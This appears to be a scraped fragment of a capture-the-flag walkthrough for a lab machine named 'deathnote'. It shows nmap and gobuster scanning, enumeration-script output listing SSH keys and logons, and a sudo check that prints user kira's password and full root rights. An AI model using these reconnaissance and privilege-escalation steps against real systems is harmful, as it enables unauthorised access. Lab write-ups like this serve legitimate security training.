PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
gobuster
1
gobuster dir -t 100 -u http://192.168.0.27 -w Documents/wordlist/directory-list-medium.txt
Nothing interesting with the lse lp: Sound interesting
1 2 3
╔══════════╣ .sh files in path ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path /usr/bin/gettext.sh
Good
1 2 3 4 5 6 7
╔══════════╣ Analyzing SSH Files (limit 70)
-rw-r--r-- 1 kira kira 393 Jul 19 2021 /home/kira/.ssh/authorized_keys ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDyiW87OWKrV0KW13eKWJir58hT8IbC6Z61SZNh4Yzm9XlfTcCytDH56uhDOqtMR6jVzs9qCSXGQFLhc6IMPF69YMiK9yTU5ahT8LmfO0ObqSfSAGHaS0i5A73pxlqUTHHrzhB3/Jy93n0NfPqOX7HGkLBasYR0v/IreR74iiBI0JseDxyrZCLcl6h9V0WiU0mjbPNBGOffz41CJN78y2YXBuUliOAj/6vBi+wMyFF3jQhP4Su72ssLH1n/E2HBimD0F75mi6LE9SNuI6NivbJUWZFrfbQhN2FSsIHnuoLIJQfuFZsQtJsBQ9d3yvTD2k/POyhURC6MW0V/aQICFZ6z l@deathnote
ChallengeResponseAuthentication no UsePAM yes
Users:
1 2 3 4 5
╔══════════╣ Last time logon each user Username Port From Latest root tty1 Mon Jul 19 11:26:48 -0400 2021 l pts/0 192.168.1.6 Sat Sep 4 06:12:29 -0400 2021 kira pts/1 127.0.0.1 Sat Sep 4 06:00:09 -0400 2021
$ sudo -l sudo -l [sudo] password for kira: kiraisevil
Matching Defaults entries for kira on deathnote: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User kira may run the following commands on deathnote: (ALL : ALL) ALL